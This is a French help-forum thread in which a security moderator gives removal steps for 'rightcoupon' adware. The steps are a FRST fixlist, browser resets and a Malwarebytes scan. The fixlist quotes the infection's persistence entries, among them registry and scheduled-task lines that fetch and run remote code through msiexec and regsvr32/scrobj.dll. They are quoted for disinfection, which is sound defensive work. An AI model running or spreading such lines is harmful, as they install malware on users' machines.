Probleme avec rightcoupon
Fermé
TONY LOQUET
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Modifié le 2 juin 2017 à 14:23
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 2 juin 2017 à 17:56
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 2 juin 2017 à 17:56
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Malekal_morte-
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15 décembre 2020
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Modifié le 2 juin 2017 à 17:57
Modifié le 2 juin 2017 à 17:57
Salut,
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
Pour Firefox, il faudra peut-être faire ceci :
Ouvre Mon Ordinateur, dans la barre d'adresse, tape %LOCALAPPDATA%
=> https://forum.malekal.com/download/file.php?id=12903
Ouvre le dossier Mozilla puis Firefox et Profiles.
Supprime le dossier qui s'y trouve (de la forme i9o0vjrp.default-1472460798100)
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Veuillez appuyer sur une touche pour continuer la désinfection...
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2514790832-2776700373-1122481903-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QFdlYRTIcN8F5RjI4NjzWNUF5MjF5OUY5M8Y5FjM3Nc%3D%3D /q
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
HKU\S-1-5-21-2514790832-2776700373-1122481903-1001\...\Run: [Chromium] => "c:\users\aurélie\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session --restore-last-session
c:\users\aurélie\appdata\local\chromium
HKU\S-1-5-21-2514790832-2776700373-1122481903-1001\...\Run: [Amazon Music] => C:\Users\Aurélie\AppData\Local\Amazon Music\Amazon Music Helper.exe [5908968 2016-06-16] ()
2017-06-01 10:23 - 2017-06-01 10:23 - 00000000 _____ C:\WINDOWS\SysWOW64\55
2017-06-01 10:23 - 2017-06-01 10:23 - 00000000 _____ C:\WINDOWS\SysWOW64\33
2017-06-01 10:22 - 2017-06-01 10:22 - 00000042 _____ C:\WINDOWS\SysWOW64\GZ
2017-06-01 10:22 - 2017-06-01 10:22 - 00000000 _____ C:\WINDOWS\SysWOW64\3333
2017-06-01 10:22 - 2017-06-01 10:22 - 00000000 _____ C:\WINDOWS\SysWOW64\2222
2017-05-18 11:23 - 2017-06-01 10:22 - 00000000 _____ C:\WINDOWS\SysWOW64\1111
2017-05-18 11:23 - 2017-06-01 10:22 - 00000000 _____ C:\WINDOWS\SysWOW64\00
2017-05-18 11:23 - 2017-05-18 11:23 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333
2017-05-18 11:23 - 2017-05-18 11:23 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
C:\Users\Aurélie\AppData\Local\Tempzxpsign*
Task: {C36C3A06-FC7D-4D34-9293-4D4E6775FA5E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1QFdlYRTIcN8F5RjI4NjzWNUF5MjF5OUY5M8Y5FjM3Nc== scrobj.dll
Task: {CC7DE813-C46D-4D5D-9A58-4BA44C703166} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1QFdlYRTIcN8F5RjI4NjzWNUF5MjF5OUY5M8Y5FjM3Nc== scrobj.dll
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
Pour Firefox, il faudra peut-être faire ceci :
- Exporte tes marques pages / favoris sous Mozilla Firefox
- Désinstalle Mozilla Firefox en cochant l'option de "Suppression du profil."
Ouvre Mon Ordinateur, dans la barre d'adresse, tape %LOCALAPPDATA%
=> https://forum.malekal.com/download/file.php?id=12903
Ouvre le dossier Mozilla puis Firefox et Profiles.
Supprime le dossier qui s'y trouve (de la forme i9o0vjrp.default-1472460798100)
- Ré-installe complètement Mozilla Firefox
- Ré-importe tes marques pages / favoris sous Mozilla Firefox
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Veuillez appuyer sur une touche pour continuer la désinfection...